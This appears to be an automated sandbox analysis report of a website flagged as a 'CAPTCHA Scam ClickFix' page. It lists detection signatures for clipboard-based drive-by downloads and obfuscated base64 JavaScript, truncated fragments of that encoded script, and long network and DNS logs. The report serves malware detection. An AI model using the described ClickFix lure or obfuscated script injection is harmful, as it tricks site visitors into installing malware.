Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://phothockey.ch

Overview

General Information

Sample URL:http://phothockey.ch
Analysis ID:1584864

Detection

CAPTCHA Scam ClickFix
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
HTML page contains suspicious base64 encoded javascript
HTML page contains hidden javascript code
HTML page contains obfuscated script src
HTML page contains string obfuscation
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1808,i,3970310272871863177,2319313575735297340,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://phothockey.ch" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.2.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    1.19.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      1.14.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
        1.20.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
          1.22.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            Phishing

            barindex
            Source: Yara matchFile source: 1.2.pages.csv, type: HTML
            Source: Yara matchFile source: 1.19.pages.csv, type: HTML
            Source: Yara matchFile source: 1.14.pages.csv, type: HTML
            Source: Yara matchFile source: 1.20.pages.csv, type: HTML
            Source: Yara matchFile source: 1.22.pages.csv, type: HTML
            Source: Yara matchFile source: 1.32.pages.csv, type: HTML
            Source: Yara matchFile source: 1.30.pages.csv, type: HTML
            Source: https://phothockey.ch/HTTP Parser: Base64 decoded: <script>
            Source: https://phothockey.ch/HTTP Parser: Base64 decoded: exchange=11&google_gid=CAESEO_-B7pj2AccMaSOL55OwuQ&google_cver=1&google_push=AXcoOmRFufMc8nhWYzHnexrYWbuRO7RqgUo2E9jRCCnciJztcitsZf-BB04MgrnEu4e-kB0mjtCY59X_947hAePsxE-wPkyVNqms1I0
            Source: https://phothockey.ch/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4NGQyZmYzID0gXzB4ZjdkOTsKKGZ1bmN0aW9uIChfMHhkMmU3YzIsIF8weDEzZWFhNCkgewogICAgY29uc3QgXzB4MjQ5ZWE5ID0gXzB4ZjdkOSwgXzB4NTA0ODViID0gXzB4ZDJlN2MyKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
            Source: https://phothockey.ch/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4NGQyZmYzID0gXzB4ZjdkOTsKKGZ1bmN0aW9uIChfMHhkMmU3YzIsIF8weDEzZWFhNCkgewogICAgY29uc3QgXzB4MjQ5ZWE5ID0gXzB4ZjdkOSwgXzB4NTA0ODViID0gXzB4ZDJlN2MyKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
            Source: https://phothockey.ch/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4NGQyZmYzID0gXzB4ZjdkOTsKKGZ1bmN0aW9uIChfMHhkMmU3YzIsIF8weDEzZWFhNCkgewogICAgY29uc3QgXzB4MjQ5ZWE5ID0gXzB4ZjdkOSwgXzB4NTA0ODViID0gXzB4ZDJlN2MyKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
            Source: https://phothockey.ch/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4NGQyZmYzID0gXzB4ZjdkOTsKKGZ1bmN0aW9uIChfMHhkMmU3YzIsIF8weDEzZWFhNCkgewogICAgY29uc3QgXzB4MjQ5ZWE5ID0gXzB4ZjdkOSwgXzB4NTA0ODViID0gXzB4ZDJlN2MyKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
            Source: https://phothockey.ch/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4NGQyZmYzID0gXzB4ZjdkOTsKKGZ1bmN0aW9uIChfMHhkMmU3YzIsIF8weDEzZWFhNCkgewogICAgY29uc3QgXzB4MjQ5ZWE5ID0gXzB4ZjdkOSwgXzB4NTA0ODViID0gXzB4ZDJlN2MyKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
            Source: https://phothockey.ch/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4NGQyZmYzID0gXzB4ZjdkOTsKKGZ1bmN0aW9uIChfMHhkMmU3YzIsIF8weDEzZWFhNCkgewogICAgY29uc3QgXzB4MjQ5ZWE5ID0gXzB4ZjdkOSwgXzB4NTA0ODViID0gXzB4ZDJlN2MyKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
            Source: https://phothockey.ch/HTTP Parser: Script src: data:text/javascript;base64,Y29uc3QgXzB4NGQyZmYzID0gXzB4ZjdkOTsKKGZ1bmN0aW9uIChfMHhkMmU3YzIsIF8weDEzZWFhNCkgewogICAgY29uc3QgXzB4MjQ5ZWE5ID0gXzB4ZjdkOSwgXzB4NTA0ODViID0gXzB4ZDJlN2MyKCk7CiAgICB3aGlsZSAoISFbXSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGNvbn
            Source: https://phothockey.ch/HTTP Parser: Found new string: script .document.write('<scr' + 'ipt type="text/javascript">gbcallslot3961("div-ad-gds-3961-3", "CLICK_URL_UNESC")</scr' + 'ipt>');...
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: https://phothockey.ch/HTTP Parser: No favicon
            Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:50156 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:50163 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:50176 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:50179 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:50208 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:50412 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:50442 version: TLS 1.2
            Source: chrome.exeMemory has grown: Private usage: 1MB later: 28MB
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: phothockey.chConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: phothockey.ch
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: ml3y3bxxlq19.i.optimole.com
            Source: global trafficDNS traffic detected: DNS query: translate.google.com
            Source: global trafficDNS traffic detected: DNS query: gbucket.ch
            Source: global trafficDNS traffic detected: DNS query: data-seed-prebsc-1-s1.bnbchain.org
            Source: global trafficDNS traffic detected: DNS query: _8545._https.data-seed-prebsc-1-s1.bnbchain.org
            Source: global trafficDNS traffic detected: DNS query: weather.da-services.ch
            Source: global trafficDNS traffic detected: DNS query: gs-goldbach.da-services.ch
            Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
            Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
            Source: global trafficDNS traffic detected: DNS query: analytics.google.com
            Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
            Source: global trafficDNS traffic detected: DNS query: ch-gmtdmp.mookie1.com
            Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
            Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
            Source: global trafficDNS traffic detected: DNS query: mc.yandex.ru
            Source: global trafficDNS traffic detected: DNS query: master.gbads.io
            Source: global trafficDNS traffic detected: DNS query: mc.yandex.com
            Source: global trafficDNS traffic detected: DNS query: cms.quantserve.com
            Source: global trafficDNS traffic detected: DNS query: sync.ipredictive.com
            Source: global trafficDNS traffic detected: DNS query: ads.travelaudience.com
            Source: global trafficDNS traffic detected: DNS query: a.c.appier.net
            Source: global trafficDNS traffic detected: DNS query: match.prod.bidr.io
            Source: global trafficDNS traffic detected: DNS query: dsp.adkernel.com
            Source: global trafficDNS traffic detected: DNS query: analytics.pangle-ads.com
            Source: global trafficDNS traffic detected: DNS query: cdn.adsafeprotected.com
            Source: global trafficDNS traffic detected: DNS query: securepubads.g.doubleclick.net
            Source: global trafficDNS traffic detected: DNS query: beagle.prod.tda.link
            Source: global trafficDNS traffic detected: DNS query: acdn.adnxs.com
            Source: global trafficDNS traffic detected: DNS query: pixel.adsafeprotected.com
            Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
            Source: global trafficDNS traffic detected: DNS query: fundingchoicesmessages.google.com
            Source: global trafficDNS traffic detected: DNS query: beagleider.tamedia.link
            Source: global trafficDNS traffic detected: DNS query: dollar.prod.tda.link
            Source: global trafficDNS traffic detected: DNS query: zuba2.prod.tda.link
            Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
            Source: global trafficDNS traffic detected: DNS query: tr.blismedia.com
            Source: global trafficDNS traffic detected: DNS query: ep1.adtrafficquality.google
            Source: global trafficDNS traffic detected: DNS query: ep2.adtrafficquality.google
            Source: global trafficDNS traffic detected: DNS query: 48bd8c19a5fd0a97afed493c575e3391.azr.footprintdns.com
            Source: global trafficDNS traffic detected: DNS query: secure.adnxs.com
            Source: global trafficDNS traffic detected: DNS query: pexus.prod.tda.link
            Source: global trafficDNS traffic detected: DNS query: pm.w55c.net
            Source: global trafficDNS traffic detected: DNS query: b1sync.zemanta.com
            Source: global trafficDNS traffic detected: DNS query: sync.srv.stackadapt.com
            Source: global trafficDNS traffic detected: DNS query: b1sync.outbrain.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
            Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
            Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
            Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50339
            Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
            Source: unknownNetwork traffic detected: HTTP traffic on port 50339 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
            Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50346
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
